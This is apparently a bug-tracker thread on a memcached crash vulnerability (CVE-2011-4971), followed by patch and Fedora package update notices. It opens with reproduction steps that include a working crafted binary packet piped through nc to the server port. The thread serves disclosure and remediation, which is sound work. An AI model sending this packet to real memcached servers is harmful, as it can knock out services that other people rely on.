This was originally reported by Stefan Bucur: 1. Start memcached in TCP mode. For example: $ ./memcached -v -p 11211 -U 0 2. Send the specially crafted packet to it: $ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211 ==== There is a patch mentioned in the original issue report, but the code has changed significantly since then. External References: https://code.google.com/p/memcached/issues/detail?id=192 http://insecurety.net/?p=872
Created memcached tracking bugs for this issue Affects: fedora-all [bug 957966]
Created memcached tracking bugs for this issue Affects: epel-5 [bug 957967]
Created memcached tracking bugs for this issue Affects: epel-6 [bug 957969]
Proposed upstream patch (with a test): https://code.google.com/p/memcached/issues/detail?id=192#c19
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks! https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository. If problems still persist, please make note of it in this bug report.
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2011-4971